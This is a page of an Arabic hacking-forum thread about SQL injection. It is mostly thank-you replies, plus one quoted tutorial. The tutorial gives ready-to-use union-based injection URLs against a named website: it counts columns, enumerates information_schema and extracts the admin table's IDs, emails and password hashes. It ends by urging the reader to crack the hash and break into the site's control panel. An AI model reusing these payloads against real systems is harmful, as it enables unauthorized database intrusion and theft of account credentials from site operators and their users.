:: vBspiders Professional Network ::
صفحة 3 من 4 12 3 4
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   ترتيب الخطوات في حقن قواعد البيانات SQL Injection (http://www.vbspiders.com/vb/t20088.html)

CODLegend 08-23-2013 04:56 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شكرا أخي الكريم على الموضوع

ahmad156 08-24-2013 12:36 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شكرا

electrone1993 08-29-2013 02:16 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
thanks; that was important for us

D7OMI 09-11-2013 11:59 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شكراً لك ي غالي ,

Soli0022 09-23-2013 09:53 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شكرا اخي الكريم

ZiAD SAiD 10-10-2013 08:11 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مجهود رائع

onelove55 10-23-2013 09:12 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
thank you :)

omar2 11-08-2013 05:49 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
:icon30:
اقتباس:
المشاركة الأصلية كتبت بواسطة KaLa$nikoV (المشاركة 70070)
عنا موقع مصاب




نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

كود PHP:
order by 1--
 
order by 5--
 
order by 10--
 
order by 15-- 
لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا
كود PHP:
order by 1/* 
يا نورع العين نرجع لمكانا


order by 15--

لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

يصير الرابط هيك

كود PHP:
 
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
انتبه للناقص

الان لنعرف اصدار القاعده
نكتب
كود PHP:
 
version() 
وهذه بعض الاوامر


database()
version()
user()

not end



الموضعوع لم ينتهي بعد


الان نضيف التالي للحقنه



كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema
و

كود PHP:
 
+from+information_schema.columns-- 
فتصبح

كود PHP:
 
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns-- 
الان نضيف الامر التالي
كود PHP:
where+column_name+LIKE+CHAR(371129711537
كود PHP:
 
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف

طيب الخبره رح تعلمك شو تختار


الان عنا مفترق مثلث ماشاء الله

شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده




زي ما انتو شايفين عنا خيارين
بتهيالي الاول هو الي مطلوب

خلينا نشتغل عليه



بلزمنا الان الموقع الرائع وهو

كود PHP:
 
http://www.waraxe.us/sql-char-encoder.html 
اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو

نوع التشفير هو
كود PHP:
 
  MySql hex-encoded string 
يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر

where+table_name=



يعني هيك

كود PHP:
where+table_name=0x53757276657941646d696e73 
الاستغلال


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73-- 
ما شاء الله طلع لنا خيارات كثيره

بهمني انا منها


الان خلينا نجمع الاستغلال


اسم الجدول


السجما
SURVEYS

اسم العمود هو باقي الاسماء بالوسط
ورح نجمعها كلها مع بعض بالامر

concat

وبتصير هيك

concat(name,0x3a,pass)


كود PHP:
;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm
[php]

نجمعهم بالامر

بصيرو

كود PHP:

concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm
نركبه بالحقنه


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins-- 
بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق







استفين ع التاخر هي الدرس بالفيديو .....

alluhaiby 12-04-2013 01:27 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
جزاك الله خيرا

mojaweb0 12-30-2013 05:57 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
لي المشاهدة

محمد الرويس 01-22-2014 01:41 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مششششكور

شوية معرصين 03-18-2014 08:44 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
ممتاز

kacem162004 03-29-2014 02:24 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مشكوووووووووور أخي على الشرح

Jaza 04-26-2014 04:11 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
فكيت ازممممة

بانوراما الحازمي 05-13-2014 02:58 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
-


موضوع بطل ، تسلم يمينك اخوي

rmieng 05-18-2014 12:01 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مشكووووووور والله يعطيك العافية

dr.naw 05-21-2014 05:03 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مشكور

BeginSpy 06-25-2014 02:20 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
في ح عنده معلومات عن لغة البرمجة لقواعد البيانات Nosql

/*-+ 06-26-2014 04:43 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
.

ghost libya 07-04-2014 04:22 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مشكور ع الشرح الوافي

katana5791 07-08-2014 05:02 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مشكور أخي على الشرح

MMHackerx 07-28-2014 03:40 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مشاء الله تبارك الرحمن

clack 08-02-2014 08:39 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
meciiiiiiiiiiiiiiiiiii

LegendRoc 09-11-2014 12:06 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
allah 3lak

dr delete 10-09-2014 06:49 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
يعطيك العافيه ع الطرح

رويال الحربي 12-02-2014 07:38 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
يعطيك العافيه

yoyodz 12-19-2014 03:27 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
تسلم علي موضوع

wagday 12-23-2014 04:36 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
رائع جدااا :icon28::icon28:

x11 01-12-2015 01:42 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
good one

Mr.ColdZero 01-24-2015 07:29 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
مشكووووووووووووووووور

Méster^^Ssâmâd 02-26-2015 02:19 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شرح رائع
شكرا لك أخي

mehdiotm1 03-22-2015 08:37 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
thankssssss

HassanAldawie 03-26-2015 09:43 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شكرا

younestlm131 03-29-2015 06:35 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
thanks you very much

nefzawi 03-31-2015 05:40 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
يعطيك العافية

heroshi 04-07-2015 05:35 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
merci

GastDz 04-12-2015 01:55 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شكرااا جزيلا اخي

yakout17 05-21-2015 11:19 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
بارك الله فيييييييييييك

kira_itachi 08-08-2015 02:07 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
mercii boocoo khouya lah youstrek

علي محمد260 08-10-2015 09:19 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
يعطيكك العافيه م تقصر


الساعة الآن 07:52 AM
صفحة 3 من 4 12 3 4
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0